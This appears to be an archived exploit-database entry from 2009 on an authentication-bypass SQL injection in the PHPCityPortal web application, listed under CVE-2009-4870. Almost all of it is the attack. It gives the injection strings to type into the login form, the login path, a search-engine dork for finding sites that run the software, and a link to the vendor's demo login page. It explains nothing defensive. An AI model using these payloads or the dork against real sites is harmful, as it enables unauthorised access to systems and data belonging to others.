PHPCityPortal - Authentication Bypass

Author: CoBRa_21
type: webapps
platform: php
port: 
date_added: 2009-08-06 
date_updated:  
verified: 1 
codes: OSVDB-56865;CVE-2009-4870 
tags: 
aliases:  
screenshot_url:  
application_url: 

******************************************************************************************
Script Name: PHPCityPortal (Auth Bypass) SQL Injection Vulnerability

Author:   CoBRa_21

Mail:    uyku_cu@windowslive.com

Script Page:  http://phpcityportal.com/

DOrk:    intext:"Powered by PHPCityPortal.com"

******************************************************************************************
EXPLOIT

Username: 'or'

Password: 'or'

http://localhost/[path]/login.php

Demo: http://phpcityportal.com/demo/login.php

******************************************************************************************

# milw0rm.com [2009-08-07]